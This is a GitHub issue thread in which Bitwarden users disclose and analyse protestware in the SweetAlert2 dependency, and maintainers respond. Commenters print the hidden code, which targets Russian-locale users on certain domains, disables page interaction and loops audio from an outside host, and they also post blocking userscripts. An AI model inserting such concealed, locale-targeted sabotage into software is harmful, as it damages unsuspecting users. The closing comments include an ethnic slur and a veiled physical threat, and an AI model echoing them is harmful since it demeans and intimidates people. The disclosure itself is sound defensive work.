SweetAlert2 loads Ukraine anthem

[DarkCat09]

Steps To Reproduce

SweetAlert2 loads ukraine anthem if browser language is set to Russian or web vault is hosted on RU/РФ domain.
It is used as dependency: https://github.com/bitwarden/clients/blob/master/package.json#L198

See also https://github.com/dani-garcia/bw_web_builds/issues/132

I've downloaded the latest release of web vault and checked with grep:

$ grep -i -o -r ukraina.mp3 build/
build/app/vendor.d6556a6abd8a862bb28c.js.map:Ukraina.mp3
build/app/vendor.d6556a6abd8a862bb28c.js:Ukraina.mp3

Expected Result

Expected Result: no politics.

Actual Result

Actual Result: error while loading ukraine anthem in DevTools console.

Screenshots or Videos

No response

Additional Context

No response

Operating System

Linux

Operating System Version

No response

Web Browser

Firefox

Browser Version

No response

Build Version

v2023.5.1

Issue Tracking Info

• [X] I understand that work is tracked outside of Github. A PR will be linked to this issue should one be opened to address it, but Bitwarden doesn't use fields like "assigned", "milestone", or "project" to track progress.

[DarkCat09]

I've read the conversation in https://github.com/bitwarden/clients/pull/5011 and the related issue https://github.com/bitwarden/clients/issues/4540, and now I don't think that developers will do anything...

[atjbramley]

Hi @DarkCat09,

This has been escalated for further investigation. If you have more information that can help us, please add it below.

Thanks!

[Tipoff4317]

https://github.com/sweetalert2/sweetalert2/commits/c4dd5dcaf08e24c334f4ce62079d3234f193b2d9/README.md

• 2022-11-24 Became a protestware, disabling plugin for the .ru, .su, and .рф domain zones and playing Ukrainian national anthem
• 2023-06-06 Added .by domain zone to the above

[DarkCat09]

@atjbramley,

Thanks for your quick response.

If you are not going to use another JavaScript library, take a look at https://github.com/lofcz/sweetalert2-neutral

[Hinton]

Hi @DarkCat09,

I've looked into the issue, and Bitwarden does not use a vulnerable version of SweetAlert2. We've intentionally not upgraded to newer major versions to avoid this issue.

I took a quick look at VaultWarden's build process, and they run npm audit --fix which seems to bump SweetAlert2 to a new major version. Since Bitwarden does not provide support for unofficial builds this issue will be closed.

[DarkCat09]

@Hinton,

Really? I've checked the latest web vault release now:

$ wget https://github.com/bitwarden/clients/releases/download/web-v2023.5.1/web-2023.5.1-selfhosted-open-source.zip
...
2023-07-06 12:02:55 (101 KB/s) - «web-2023.5.1-selfhosted-open-source.zip» сохранён [10593568/10593568]

$ 7z x web-2023.5.1-selfhosted-open-source.zip

7-Zip [64] 17.04 : Copyright (c) 1999-2021 Igor Pavlov : 2017-08-28
p7zip Version 17.04 (locale=ru_RU.UTF-8,Utf16=on,HugeFiles=on,64 bits,12 CPUs x64)

Scanning the drive for archives:
1 file, 10593568 bytes (11 MiB)

Extracting archive: web-2023.5.1-selfhosted-open-source.zip
--
Path = web-2023.5.1-selfhosted-open-source.zip
Type = zip
Physical Size = 10593568

Everything is Ok

Folders: 75
Files: 226
Size:       41831531
Compressed: 10593568

$ cd build
$ grep -ior ukraina.mp3 .
./app/vendor.d6556a6abd8a862bb28c.js.map:Ukraina.mp3
./app/vendor.d6556a6abd8a862bb28c.js:Ukraina.mp3
$ more ./app/vendor.d6556a6abd8a862bb28c.js
/Ukraina.mp3  (slash is "find" command)

if("undefined"!=typeof window&&/^ru\b/.test(navigator.language)&&location.host.match(/\.(ru|su|xn--p1ai)$/)){var pi=new Date,mi=localStorage.getItem("swal-initiation");mi?(pi.getTime()-Date.parse(mi))/864e5>3&&setTimeout((function(){document.body.style.pointerEvents="none";var e=document.createElement("audio");e.src="https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3",e.loop=!0,document.body.appendChild(e),setTimeout((function(){e.play().catch((function(){}))}),2500)}),500)

Maybe your CI/CD system also updates packages?

[DarkCat09]

Here is the SHA256 sum of the release file I downloaded:

d918f0f8cbddc398353dddaac7821322fba4f33c722c8821a8c9132e6df53f57  web-2023.5.1-selfhosted-open-source.zip

[DarkCat09]

SweetAlert2 10.16.1 specified in package.json was released before 24.02.2022, so there should be no malicious code. But there is (at least, in the pre-built web vault).

[DarkCat09]

GitHub Actions build-web config:

https://github.com/bitwarden/clients/blob/db2427e05c46c0ba5f77cacebba2c82c7c3b2421/.github/workflows/build-web.yml#L73-L76

https://github.com/bitwarden/clients/blob/db2427e05c46c0ba5f77cacebba2c82c7c3b2421/.github/workflows/build-web.yml#L122-L124

---

Build command in apps/web/package.json:

https://github.com/bitwarden/clients/blob/db2427e05c46c0ba5f77cacebba2c82c7c3b2421/apps/web/package.json#L18

[DarkCat09]

That's weird. Where CI updates packages?

[Hinton]

I took a second look and you are right, it seems the dependency was updated to a newer patch release recently which seems to bring in this issue. We're partially in the process of replacing SweetAlert2 with our own dialogs already though.

[InvisibleRain]

Any progress on fixing this vulnerability?

[DarkCat09]

@Hinton, I'm sorry to bother you, but could I ask if there is any progress?

I still see swal2 in package(-lock).json, grep still finds "ukraina.mp3" in the latest web vault build.

If rewriting UI to custom dialogs takes much time, why don't use npm i sweetalert2-neutral for now?

I moved to KeePassXC + Syncthing, because I didn't want to wait for the fix and realized that serverless password storage is more secure. But I just want to be sure that Bitwarden does not support neither Ukraine, nor Russia, so I'll be glad to hear about updates on removing sweetalert2.

Upd: thanks a lot for reacting. I've subscribed to PR discussion.

[sguryev]

It has taken 2 months to remove MIR options (request: https://github.com/bitwarden/clients/pull/5011 and PR: https://github.com/bitwarden/clients/issues/4540) 2 months has been passed for this issue to remove Ukraine anthem 🤞🏼

[lukateras]

@DarkCat09 Thank you for digging into this Andrey! :3

Here's the formatted version of the snippet in question as of v2023.5.1:

if ("undefined" != typeof window && /^ru\b/.test(navigator.language) && location.host.match(/\.(ru|su|xn--p1ai)$/)) {
    var pi = new Date,
        mi = localStorage.getItem("swal-initiation");

    // If three hours have passed since SweetAlert2 has first seen the origin...
    // https://developer.mozilla.org/docs/Glossary/Origin
    mi ? (pi.getTime() - Date.parse(mi)) / 864e5 > 3 && setTimeout((function() {
        document.body.style.pointerEvents = "none";
        var e = document.createElement("audio");
        e.src = "https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3",
        e.loop = !0,
        document.body.appendChild(e), setTimeout((function() {
            e.play().catch((function() {}))
        }), 2500)
    }), 500) : /* ... */ null
}

Compare to: https://github.com/sweetalert2/sweetalert2/blob/v11.6.13/src/SweetAlert.js#L261-L281

Gist: https://gist.github.com/yanalunaterra/1adaf6173f13875cbd49303009f4ef31

[sguryev]

Does it mean that workaround is to block flag-gimn.ru domain completely and ignore console errors and missing alerts?

[DarkCat09]

@sguryev, also, you need to start a script that reverses pointerEvents = "none", i.e.

window.addEventListener('load', () => { document.body.style.pointerEvents = "auto" })

But I hope this will be fixed soon.

[lukateras]

@sguryev Спробуй:

// ==UserScript==
// @name     SweetAlert2 protestware workaround
// @version  1
// @match    *://*.ru/*
// @match    *://*.su/*
// @match    *://*.by/*
// @match    *://*.xn--p1ai/*
// ==/UserScript==

// Tested against v11.7.27:
// https://github.com/sweetalert2/sweetalert2/blob/v11.7.27/src/SweetAlert.js#L261-L285

const observer = new MutationObserver(function(records, _) {
  for (const record of records) {
    for (const node of record.addedNodes) {
      if (node.src === "https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3") {
        document.body.style.removeProperty("pointer-events");
        node.pause();
        node.src = "";
        node.remove();
      }
    }
  }
});

observer.observe(document.body, { childList: true });

Ось як користуватися: https://github.com/awesome-scripts/awesome-userscripts#how-to-use

(;

[lukateras]

v2023.5.0 is the earliest release affected.

[willmartian]

We're in the final stages of getting this dependency fully removed for the September release.

[limonte]

Thank you for years of using my small plugin ❤️ and apologies for bringing this hassle to your project.

I hope to see one day that Bitwarden Inc. stands with Ukraine (something similar to this). Not restricting your service to ruzzians might negatively affect the reputation of the business.

Sincerely, happy Bitwarden user, this repo contributor, and the author of @sweetalert2

[sguryev]

@limonte

Not restricting your service to ruzzians might negatively affect the reputation of the business.

Is it the threat?

[reysonk]

Not restricting your service to ruzzians might negatively affect the reputation of the business.

Look around when you walk in the evenings.